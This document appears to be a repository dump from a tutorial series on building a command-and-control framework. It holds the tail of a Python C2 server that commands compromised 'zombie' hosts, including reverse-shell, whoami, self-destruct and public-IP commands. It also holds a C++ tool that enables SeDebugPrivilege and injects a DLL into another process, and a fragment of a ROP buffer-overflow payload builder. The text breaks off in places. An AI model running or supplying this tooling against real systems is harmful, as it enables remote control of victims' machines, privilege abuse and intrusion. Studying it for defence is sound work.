112 | print(Fore.GREEN + "[+] Message Sent!" + Fore.WHITE)
113 | time.sleep(2)
114 | except:
115 | print(Fore.RED + "[!] there was an error sending the msg to the zombie...\ncheck to see if your zombie died" + Fore.WHITE)
116 | time.sleep(2)
117 | if choice == "2":
118 | for a in clientdata[selection]:
119 | print(a)
120 | input()
121 | if choice == "3":
122 | try:
123 | clientlist[selection][1].send(b"c0mm@nd\ncurl ifconfig.me\n")
124 | print(Fore.GREEN + "[+] command sent!" + Fore.WHITE)
125 | pubip=clientlist[selection][1].recv(1024)
126 | pubip = pubip.decode('UTF-8')
127 | print(pubip)
128 | input("press any key...")
129 | except:
130 | print(Fore.RED + "[!] there was an error sending the command to the zombie...\ncheck to see if your zombie died" + Fore.WHITE)
131 | time.sleep(2)
132 | if choice == "4":
133 | try:
134 | clientlist[selection][1].send(b"self-destruct\n")
135 | print(Fore.GREEN + "[+] zombie self-destruct succeeded!" + Fore.WHITE)
136 | time.sleep(2)
137 | except:
138 | print(Fore.RED + "[!] There was an issue communicating with the zombie...\ncheck to see if your zombie died" + Fore.WHITE)
139 | time.sleep(2)
140 | if choice == "5":
141 | #starttheshell(clientlist[selection][1])
142 | #subprocess.call(["python", "testsocketserver.py"])
143 | exit_event.clear()
144 |
145 | handler_thread = threading.Thread(target=startrevshellsvr)
146 | handler_thread.daemon = True
147 | handler_thread.start()
148 |
149 | print("[+] starting shell in 2 seconds!")
150 | time.sleep(2)
151 |
152 | clientlist[selection][1].send(b":shell:\n")
153 |
154 | #handler_thread2 = threading.Thread(target=startrevshellcli)
155 | #handler_thread2.daemon = True
156 | #handler_thread2.start()
157 | while not exit_event.is_set():
158 | time.sleep(1)
159 | return
160 | if choice == "6":
161 | clientlist[selection][1].send(b":whoami:\n")
162 | whoami=clientlist[selection][1].recv(1024)
163 | whoami = whoami.decode('UTF-8')
164 | print("You are: ", whoami)
165 | time.sleep(2)
166 |
167 | if choice == "15":
168 | return
169 |
170 | def server_selection():
171 | global clientlist
172 | commands="True"
173 |
174 |
175 | while not "exit" in commands:
176 |
177 | command=input(Fore.CYAN + "<< elev8 >> $ " + Fore.WHITE)
178 | if command=="":
179 | pass
180 | if command=="zombies":
181 | zombies()
182 | if command == "cls" or command == "clear":
183 | if os.name == 'nt':
184 | os.system("cls")
185 | else:
186 | os.system("clear")
187 | if command == "?" or command == "help":
188 | print(Fore.YELLOW + "commands:\n$ zombies\n$ clear/cls (clears screen)\n$ control + C kills server\n" + Fore.WHITE)
189 |
190 |
191 | def init_main_sock():
192 | while True:
193 | conn, addr = s.accept()
194 | print(Fore.GREEN, f'\n[*] Accepted new connection from: {addr[0]}:{addr[1]} !!!', Fore.WHITE)
195 | # Get the client socket handle
196 | client_sock_handle = conn.fileno()
197 | print(f"Client socket handle: {client_sock_handle}")
198 | #for elevateproc in psutil.process_iter():
199 | #if "elevationstation" in elevateproc.name():
200 | #elevateproc.kill()
201 | global counter
202 | global automigrate
203 | counter+=1
204 | #print("gathering client info...")
205 | clientinfo = conn.recv(1024)
206 | clientinfo = clientinfo.decode('UTF-8')
207 | clientinfo=clientinfo.split("\n")
208 | UserInfo=clientinfo[0]
209 | #print(clientinfo)
210 | clientlist.append([counter, conn, UserInfo])
211 | clientdata.append(clientinfo)
212 |
213 | handler_thread = threading.Thread(target=probe)
214 | handler_thread.daemon = True
215 | handler_thread.start()
216 |
217 | host = "0.0.0.0"
218 | port = 4545
219 |
220 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
221 | s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
222 | s.bind((host, port))
223 | s.listen(5)
224 | print(Fore.YELLOW + "[+] listening on port "+str(port), Fore.WHITE)
225 |
226 | handler_thread = threading.Thread(target=init_main_sock)
227 | handler_thread.daemon = True
228 | handler_thread.start()
229 |
230 | handler_thread = threading.Thread(target=server_selection)
231 | handler_thread.daemon = True
232 | handler_thread.start()
233 |
234 | while True:
235 | time.sleep(1)
236 |
--------------------------------------------------------------------------------
/2024-12-20-Create your own C2 using Python - Part 3/migrator2/migrator2.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #include
5 | #include
6 | //#include "def.h"
7 | //#include
8 |
9 | #pragma comment(lib, "ntdll.lib")
10 |
11 | // Define NT_SUCCESS macro if not already defined
12 | #ifndef NT_SUCCESS
13 | #define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
14 | #endif
15 |
16 | // Define UNICODE_STRING if not already defined
17 | typedef struct _UNICODE_STRING {
18 | USHORT Length;
19 | USHORT MaximumLength;
20 | PWSTR Buffer;
21 | } UNICODE_STRING;
22 | typedef UNICODE_STRING* PUNICODE_STRING;
23 |
24 | // Define OBJECT_ATTRIBUTES if not already defined
25 | typedef struct _OBJECT_ATTRIBUTES {
26 | ULONG Length;
27 | HANDLE RootDirectory;
28 | PUNICODE_STRING ObjectName;
29 | ULONG Attributes;
30 | PVOID SecurityDescriptor;
31 | PVOID SecurityQualityOfService;
32 | } OBJECT_ATTRIBUTES;
33 | typedef OBJECT_ATTRIBUTES* POBJECT_ATTRIBUTES;
34 |
35 | // Define CLIENT_ID if not already defined
36 | typedef struct _CLIENT_ID {
37 | PVOID UniqueProcess;
38 | PVOID UniqueThread;
39 | } CLIENT_ID;
40 | typedef CLIENT_ID* PCLIENT_ID;
41 |
42 | // Macro to initialize OBJECT_ATTRIBUTES
43 | #define InitializeObjectAttributes(p, n, a, r, s) { \
44 | (p)->Length = sizeof(OBJECT_ATTRIBUTES); \
45 | (p)->RootDirectory = r; \
46 | (p)->Attributes = a; \
47 | (p)->ObjectName = n; \
48 | (p)->SecurityDescriptor = s; \
49 | (p)->SecurityQualityOfService = NULL; \
50 | }
51 |
52 |
53 | extern "C" {
54 |
55 | NTSTATUS NTAPI NtOpenProcess(
56 | PHANDLE ProcessHandle,
57 | ACCESS_MASK DesiredAccess,
58 | POBJECT_ATTRIBUTES ObjectAttributes,
59 | PCLIENT_ID ClientId
60 | );
61 |
62 | NTSTATUS NTAPI NtCreateUserProcess(
63 | PHANDLE ProcessHandle,
64 | PHANDLE ThreadHandle,
65 | ACCESS_MASK ProcessDesiredAccess,
66 | ACCESS_MASK ThreadDesiredAccess,
67 | POBJECT_ATTRIBUTES ProcessObjectAttributes,
68 | POBJECT_ATTRIBUTES ThreadObjectAttributes,
69 | ULONG ProcessFlags,
70 | ULONG ThreadFlags,
71 | PVOID ProcessParameters,
72 | PVOID CreateInfo,
73 | PVOID AttributeList
74 | );
75 |
76 | NTSTATUS NTAPI NtAllocateVirtualMemory(
77 | HANDLE ProcessHandle,
78 | PVOID* BaseAddress,
79 | ULONG_PTR ZeroBits,
80 | PSIZE_T RegionSize,
81 | ULONG AllocationType,
82 | ULONG Protect
83 | );
84 | VOID NTAPI RtlInitUnicodeString(
85 | PUNICODE_STRING DestinationString,
86 | PCWSTR SourceString
87 | );
88 | NTSTATUS NTAPI NtClose(
89 | HANDLE Handle
90 | );
91 | NTSTATUS NTAPI NtWriteVirtualMemory(
92 | HANDLE ProcessHandle,
93 | PVOID BaseAddress,
94 | PVOID Buffer,
95 | ULONG BufferLength,
96 | PULONG ReturnLength
97 | );
98 |
99 | NTSTATUS NTAPI NtCreateThreadEx(
100 | PHANDLE ThreadHandle,
101 | ACCESS_MASK DesiredAccess,
102 | PVOID ObjectAttributes,
103 | HANDLE ProcessHandle,
104 | PVOID StartRoutine,
105 | PVOID Argument,
106 | ULONG CreateFlags,
107 | ULONG_PTR ZeroBits,
108 | SIZE_T StackSize,
109 | SIZE_T MaximumStackSize,
110 | PVOID AttributeList
111 | );
112 | }
113 |
114 | void setProcessPrivs(LPCWSTR privname)
115 | {
116 |
117 | TOKEN_PRIVILEGES tp;
118 | LUID luid;
119 | HANDLE pToken;
120 |
121 | if (!LookupPrivilegeValue(
122 | NULL, // lookup privilege on local system
123 | privname, // privilege to lookup
124 | &luid)) // receives LUID of privilege
125 | {
126 | printf("[!] LookupPrivilegeValue error: %u\n", GetLastError());
127 | exit(0);
128 | }
129 |
130 | tp.PrivilegeCount = 1;
131 | tp.Privileges[0].Luid = luid;
132 | tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
133 |
134 | if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &pToken))
135 | printf("[+] opened process token!\n");
136 |
137 | if (!AdjustTokenPrivileges(pToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), (PTOKEN_PRIVILEGES)NULL, (PDWORD)NULL))
138 | {
139 | printf("[!] AdjustTokenPrivileges error: %u\n", GetLastError());
140 | exit(0);
141 | }
142 |
143 | if (GetLastError() == ERROR_NOT_ALL_ASSIGNED)
144 |
145 | {
146 | printf("[!] The token does not have this specified privilege available to the process. \n");
147 | exit(0);
148 | }
149 | printf("[+] Privilege: %ws added successfully!!!\n", privname);
150 | CloseHandle(pToken);
151 |
152 | }
153 | HANDLE OpenTargetProcess(DWORD processId) {
154 | HANDLE hProcess;
155 | OBJECT_ATTRIBUTES objAttr;
156 | InitializeObjectAttributes(&objAttr, NULL, 0, NULL, NULL);
157 |
158 | CLIENT_ID clientId;
159 | clientId.UniqueProcess = (HANDLE)(uintptr_t)processId;
160 | clientId.UniqueThread = 0;
161 |
162 | NTSTATUS status = NtOpenProcess(&hProcess, PROCESS_ALL_ACCESS, &objAttr, &clientId);
163 | if (!NT_SUCCESS(status)) {
164 | std::cerr << "[!] Failed to open process. NTSTATUS: " << status << std::endl;
165 | return NULL;
166 | }
167 | return hProcess;
168 | }
169 |
170 | PVOID AllocateMemoryInRemoteProcess(HANDLE hProcess, SIZE_T size) {
171 | PVOID baseAddress = NULL;
172 | SIZE_T regionSize = size;
173 |
174 | NTSTATUS status = NtAllocateVirtualMemory(hProcess, &baseAddress, 0, ®ionSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
175 | if (!NT_SUCCESS(status)) {
176 | std::cerr << "[!] Failed to allocate memory in remote process. NTSTATUS: " << status << std::endl;
177 | return NULL;
178 | }
179 | return baseAddress;
180 | }
181 |
182 | bool WriteMemoryInRemoteProcess(HANDLE hProcess, PVOID baseAddress, const void* buffer, SIZE_T bufferSize) {
183 | SIZE_T written = 0;
184 | NTSTATUS status = NtWriteVirtualMemory(hProcess, baseAddress, (PVOID)buffer, bufferSize, (PULONG)&written);
185 | return NT_SUCCESS(status);
186 | }
187 |
188 | bool LoadDllIntoRemoteProcess(HANDLE hProcess, PVOID remoteAddress, const std::wstring& dllPath) {
189 | HMODULE hKernel32 = GetModuleHandle(L"kernel32.dll");
190 | if (!hKernel32) {
191 | std::cerr << "[!] Failed to get handle of kernel32.dll" << std::endl;
192 | return false;
193 | }
194 |
195 | PVOID loadLibraryW = GetProcAddress(hKernel32, "LoadLibraryW");
196 | if (!loadLibraryW) {
197 | std::cerr << "[!] Failed to get address of LoadLibraryW" << std::endl;
198 | return false;
199 | }
200 |
201 | HANDLE hThread = NULL;
202 | NTSTATUS status = NtCreateThreadEx(&hThread, THREAD_ALL_ACCESS, NULL, hProcess, loadLibraryW, remoteAddress, FALSE, 0, 0, 0, NULL);
203 | if (!NT_SUCCESS(status)) {
204 | std::cerr << "[!] Failed to create remote thread. NTSTATUS: " << status << std::endl;
205 | return false;
206 | }
207 |
208 | WaitForSingleObject(hThread, INFINITE);
209 | CloseHandle(hThread);
210 | return true;
211 | }
212 |
213 | int main(int argc, char* argv[])
214 | {
215 | if (argc <= 1)
216 | {
217 | printf("Usage: migrator2.exe [pid]\n");
218 | exit(0);
219 | }
220 | setProcessPrivs(L"SeDebugPrivilege");
221 | DWORD processId;
222 | std::cout <<"argv0: " <
37 |
38 | """
39 | 0000000140007CA5 | 49:89D9 | mov r9,rbx |
40 | 0000000140007CA8 | E8 D3FCFFFF | call overflow3.140007980 |
41 | 0000000140007CAD | 48:98 | cdqe |
42 | 0000000140007CAF | 48:83C4 48 | add rsp,48 |
43 | 0000000140007CB3 | 5B | pop rbx |
44 | 0000000140007CB4 | 5E | pop rsi |
45 | 0000000140007CB5 | 5F | pop rdi |
46 | 0000000140007CB6 | 5D | pop rbp |
47 | 0000000140007CB7 | C3 | ret |
48 | """
49 | payload += b"\x90" * 72
50 | payload += b"\x90" * 32
51 |
52 | #r9 register should now hold the value 0x40 (I hate this register)
53 | ###########################################
54 |
55 | #r8 ROP gadgets (this works but RDX MUST be 0x3000)
56 |
57 | payload += struct.pack(" 0x00000001400095AC = 0x3000
59 | payload += struct.pack(" 0x00000001400000AC = 0x1000
81 | payload += struct.pack("